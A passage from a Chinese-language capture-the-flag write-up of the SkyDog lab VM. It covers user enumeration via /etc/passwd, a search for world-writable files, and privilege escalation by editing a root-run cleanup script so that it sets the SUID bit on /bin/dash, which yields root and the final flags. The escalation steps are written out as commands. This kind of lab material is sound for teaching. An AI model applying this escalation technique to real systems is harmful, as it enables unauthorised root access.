-rw-r--r-- 1 nemo          nemo            38 Sep 18  2015 flag.txt
-rw-r--r-- 1 wernerbrandes wernerbrandes  675 Sep 18  2015 .profile
-rw-rw-r-- 1 wernerbrandes wernerbrandes   66 Oct 25  2015 .selected_editor
wernerbrandes@skydogctf:~$ echo $(cat flag.txt)
flag{82ce8d8f5745ff6849fa7af1473c9b35}

成功拿到第五个flag!

Flag #5 Another Day at the Office

flag{82ce8d8f5745ff6849fa7af1473c9b35}

解密MD5得

Dr. Gunter Janek

十、信息收集

另一个参考Sneakers,尝试进行服务器内部信息收集。

cat /etc/passwd

wernerbrandes@skydogctf:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
landscape:x:104:110::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
nemo:x:1000:1000:nemo,,,:/home/nemo:/bin/bash
wernerbrandes:x:1001:1001:Werner Brandes,,,:/home/wernerbrandes:/bin/bash

只有一个nemo用户可用。

groups nemo

es@skydogctf:~$ groups nemo
nemo : nemo adm cdrom sudo dip plugdev lpadmin sambashare

该用户属于以下组:

  • nemo:表示该用户所在的主要组;

  • adm:代表系统管理员组,具有查看日志文件和其他系统信息的权限;

  • cdrom:表示可访问 CD/DVD 驱动器的组;

  • sudo:代表超级用户或管理员组,具有执行特权操作的权限;

  • dip:代表 Dialup Internet Protocol 组,用于拨号 Internet 连接;

  • plugdev:表示可控制外部设备的组;

  • lpadmin:代表打印机管理组,可以管理打印机设置和任务;

  • sambashare:表示可共享 Samba 服务器资源的组。

尝试登录nemo用户无果。

十一、另寻僻径

无法以其它方式访问或获得所需权限,搜索可写入文件。

find / -perm -0002 -type f 2>/dev/null | grep -v "/proc/"

查找Linux系统中所有普通文件(不包括目录、设备文件等)中权限有任何一位设置为写入(w)的文件,然后将这些文件的路径输出到屏幕上。其中:

  • find /:从根目录下开始查找。

  • -perm -0002:查找权限中任意一个为“写入”的文件。

  • -type f:只查找文件类型为普通文件的项目,不包括文件夹等。

  • 2>/dev/null:将标准错误输出重定向到空设备,以避免在查找过程中看到不必要的错误信息。

  • grep -v "/proc/":过滤掉路径名中包含“/proc/”字符序列的结果,以避免搜索进程目录时出现错误信息。

wernerbrandes@skydogctf:~$ find / -perm -0002 -type f 2>/dev/null | grep -v "/proc/"
/lib/log/sanitizer.py
/sys/kernel/security/apparmor/.access
wernerbrandes@skydogctf:~$ ls -alh /lib/log/sanitizer.py
-rwxrwxrwx 1 root root 127 Nov  3 14:06 /lib/log/sanitizer.py

查看/lib/log/sanitizer.py脚本

cat /lib/log/sanitizer.py

wernerbrandes@skydogctf:~$ cat /lib/log/sanitizer.py
#!/usr/bin/env python
import os
import sys

try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()

这是一个 Python 脚本,主要目的是删除 /tmp 目录下的所有文件和子目录。盲猜脚本按特定间隔运行,以确保“/tmp/”目录定时清理。

查看系统shell环境:

cat /etc/shells

wernerbrandes@skydogctf:~$ cat /etc/shells
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/tmux
/usr/bin/screen

脚本拥有root权限。于是更新脚本在“/bin/dash”二进制文件上设置 SUID 位,然后等待一段时间。

#!/usr/bin/env python
import os
import sys

try:
        os.system('chmod u+s /bin/dash')
        os.system('rm -r /tmp/* ')
except:
        sys.exit()

一段时间后查看“/bin/dash”二进制文件,执行权限由x变为s。

ls -alh /bin/dash

wernerbrandes@skydogctf:~$ ls -alh /bin/dash
-rwxr-xr-x 1 root root 119K Feb 19  2014 /bin/dash
wernerbrandes@skydogctf:~$ ls -alh /bin/dash
-rwsr-xr-x 1 root root 119K Feb 19  2014 /bin/dash

执行“/bin/dash”获取root权限。

/bin/dash

wernerbrandes@skydogctf:~$ /bin/dash
# id
uid=1001(wernerbrandes) gid=1001(wernerbrandes) euid=0(root) groups=0(root),1001(wernerbrandes)

成功提权后查找最后一个flag。

cd /root/

cd BlackBox

echo $(cat flag.txt)

# cd /root/
# ls -alh
total 36K
drwx------  3 root root 4.0K Oct 30  2015 .
drwxr-xr-x 22 root root 4.0K Sep 14  2015 ..
-rw-------  1 root root  326 Oct 30  2015 .bash_history
-rw-r--r--  1 root root 3.1K Feb 19  2014 .bashrc
drwxr-xr-x  2 root root 4.0K Sep 18  2015 BlackBox
-rw-------  1 root root   12 Oct 30  2015 .nano_history
-rw-r--r--  1 root root  140 Feb 19  2014 .profile
-rw-r--r--  1 root root   66 Oct 25  2015 .selected_editor
-rw-------  1 root root 1.7K Oct 30  2015 .viminfo
# cd BlackBox
# ls -alh
total 12K
drwxr-xr-x 2 root root 4.0K Sep 18  2015 .
drwx------ 3 root root 4.0K Oct 30  2015 ..
-rw-r--r-- 1 nemo nemo  155 Sep 18  2015 flag.txt
# echo $(cat flag.txt)
flag{b70b205c96270be6ced772112e7dd03f} Congratulations!! Martin Bishop is a free man once again! Go here to receive your reward. /CongratulationsYouDidIt

获取到flag6

Flag #6 Little Black Box

flag{b70b205c96270be6ced772112e7dd03f}

十二、彩蛋

浏览到“/CongratulationsYouDidIt”页面会看到《功夫小子》的彩蛋。

http://192.168.0.6/CongratulationsYouDidIt/You're%20the%20best...%20around!.mp4

 

posted @ 2023-05-31 15:30  HKalpa  阅读(222)  评论(0编辑  收藏  举报